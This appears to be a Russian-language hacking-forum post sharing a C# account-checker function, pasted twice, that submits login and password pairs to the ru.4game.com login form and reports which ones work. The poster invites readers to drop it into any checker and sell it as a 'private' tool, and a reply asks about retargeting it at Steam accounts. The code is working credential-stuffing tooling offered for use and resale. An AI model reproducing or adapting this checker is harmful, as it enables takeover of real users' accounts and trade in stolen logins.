Вставляем в любой сурс чекера и продаем новый приват, только не забывайте упомянуть меня и lolzteam static public bool CheckAUTH(string login = null, string password = null, bool save_cookie = false) { string data = "AuthForm[rememberMe]=1&AuthForm[password]=" + password + "&AuthForm[loginOrEmail]=" + login + "&AuthForm[*****forceDetected]="; string str; string request_url = "https://ru.4game.com/?popupWidget=AuthPopupWidget&block=login"; HttpWebRequest POST = (HttpWebRequest)HttpWebRequest.Create(request_url); if (save_cookie) POST.CookieContainer = cookies; POST.Method = "POST"; POST.AllowAutoRedirect = false; POST.UserAgent = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.101 YaBrowser/14.12.2125.7947 Safari/537.36"; POST.Host = "ru.4game.com"; POST.Accept = "*/*"; POST.Timeout = 15000; POST.ContentType = "application/x-www-form-urlencoded"; try { using (StreamWriter strwr = new StreamWriter(POST.GetRequestStream())) strwr.Write(data); using (StreamReader postish = new StreamReader(POST.GetResponse().GetResponseStream(), Encoding.UTF8)) str = postish.ReadToEnd(); if (!str.Contains("bUIButton__eShine")) return true; else return false; } catch { return false; } } Код static public bool CheckAUTH(string login = null, string password = null, bool save_cookie = false) { string data = "AuthForm[rememberMe]=1&AuthForm[password]=" + password + "&AuthForm[loginOrEmail]=" + login + "&AuthForm[*****forceDetected]="; string str; string request_url = "https://ru.4game.com/?popupWidget=AuthPopupWidget&block=login"; HttpWebRequest POST = (HttpWebRequest)HttpWebRequest.Create(request_url); if (save_cookie) POST.CookieContainer = cookies; POST.Method = "POST"; POST.AllowAutoRedirect = false; POST.UserAgent = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.101 YaBrowser/14.12.2125.7947 Safari/537.36"; POST.Host = "ru.4game.com"; POST.Accept = "*/*"; POST.Timeout = 15000; POST.ContentType = "application/x-www-form-urlencoded"; try { using (StreamWriter strwr = new StreamWriter(POST.GetRequestStream())) strwr.Write(data); using (StreamReader postish = new StreamReader(POST.GetResponse().GetResponseStream(), Encoding.UTF8)) str = postish.ReadToEnd(); if (!str.Contains("bUIButton__eShine")) return true; else return false; } catch { return false; } }
string request_url = "https://ru.4game.com/?popupWidget=AuthPopupWidget&block=login"; HttpWebRequest POST = (HttpWebRequest)HttpWebRequest.Create(request_url); POST.Host = "ru.4game.com" Вот это можно на стим изменить?И будет стим слизывать?!